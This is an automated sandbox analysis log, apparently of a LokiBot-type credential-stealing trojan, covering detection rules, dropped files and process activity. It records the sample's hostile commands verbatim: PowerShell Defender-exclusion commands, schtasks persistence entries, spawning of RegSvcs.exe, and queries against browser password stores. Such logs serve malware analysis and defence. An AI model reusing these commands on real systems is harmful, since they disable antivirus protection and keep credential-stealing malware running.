                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06785B770_2_06785B77
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06789B500_2_06789B50
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_0678EBD00_2_0678EBD0
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_0678EBC00_2_0678EBC0
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06787BB70_2_06787BB7
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06C62C700_2_06C62C70
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06C6CAC10_2_06C6CAC1
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06C665700_2_06C66570
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06C680500_2_06C68050
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06C661290_2_06C66129
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06C661380_2_06C66138
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06C62C630_2_06C62C63
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06C67C080_2_06C67C08
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06C67C180_2_06C67C18
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06C62C380_2_06C62C38
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06C65D000_2_06C65D00
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06C69B400_2_06C69B40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0040128A12_2_0040128A
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeCode function: 13_2_00FE6F9013_2_00FE6F90
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeCode function: 13_2_00FED3E413_2_00FED3E4
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeCode function: 13_2_0570C33813_2_0570C338
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeCode function: 13_2_0570657013_2_05706570
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeCode function: 13_2_0570613813_2_05706138
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeCode function: 13_2_0570612913_2_05706129
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeCode function: 13_2_0570805013_2_05708050
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeCode function: 13_2_0570C33713_2_0570C337
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeCode function: 13_2_05705D0013_2_05705D00
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeCode function: 13_2_05707C1813_2_05707C18
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeCode function: 13_2_05707C0813_2_05707C08
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeCode function: 13_2_0570991813_2_05709918
                    Source: g44YQtTyjN.exeStatic PE information: invalid certificate
                    Source: g44YQtTyjN.exe, 00000000.00000002.1500391949.0000000002664000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameutilize.exe vs g44YQtTyjN.exe
                    Source: g44YQtTyjN.exe, 00000000.00000002.1518307572.000000000B000000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs g44YQtTyjN.exe
                    Source: g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs g44YQtTyjN.exe
                    Source: g44YQtTyjN.exe, 00000000.00000000.1308952119.00000000000D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameGCbd.exeB vs g44YQtTyjN.exe
                    Source: g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameutilize.exe vs g44YQtTyjN.exe
                    Source: g44YQtTyjN.exe, 00000000.00000002.1499082414.000000000066E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs g44YQtTyjN.exe
                    Source: g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003E1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameutilize.exe vs g44YQtTyjN.exe
                    Source: g44YQtTyjN.exeBinary or memory string: OriginalFilenameGCbd.exeB vs g44YQtTyjN.exe
                    Source: g44YQtTyjN.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.1502068174.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: g44YQtTyjN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: ECmmsbHOaKPh.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, c7051ZPN8xVt8hUhsG.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, c7051ZPN8xVt8hUhsG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, c7051ZPN8xVt8hUhsG.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, nE18TyFNSpZFYFqNG7.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, nE18TyFNSpZFYFqNG7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, nE18TyFNSpZFYFqNG7.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, nE18TyFNSpZFYFqNG7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, c7051ZPN8xVt8hUhsG.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, c7051ZPN8xVt8hUhsG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, c7051ZPN8xVt8hUhsG.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, nE18TyFNSpZFYFqNG7.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, nE18TyFNSpZFYFqNG7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, c7051ZPN8xVt8hUhsG.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, c7051ZPN8xVt8hUhsG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, c7051ZPN8xVt8hUhsG.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                    Source: g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2559323570.000000000042B000.00000040.00000400.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: E*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp\
                    Source: RegSvcs.exe, 0000000C.00000002.2559323570.0000000000458000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2559302757.0000000000457000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: B*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
                    Source: RegSvcs.exeBinary or memory string: E*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/41@2/2
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeFile created: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8596:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9068:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6852:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeMutant created: \Sessions\1\BaseNamedObjects\WrwtEhvPPTssAhNEmK
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8640:120:WilError_03
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeFile created: C:\Users\user\AppData\Local\Temp\schvost.exeJump to behavior
                    Source: g44YQtTyjN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: g44YQtTyjN.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: RegSvcs.exeBinary or memory string: SELECT item1 FROM metadata WHERE id = 'password';
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, LoginData.12.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: g44YQtTyjN.exeVirustotal: Detection: 71%
                    Source: g44YQtTyjN.exeReversingLabs: Detection: 65%
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeFile read: C:\Users\user\Desktop\g44YQtTyjN.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\g44YQtTyjN.exe "C:\Users\user\Desktop\g44YQtTyjN.exe"
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp8B71.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp8B71.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
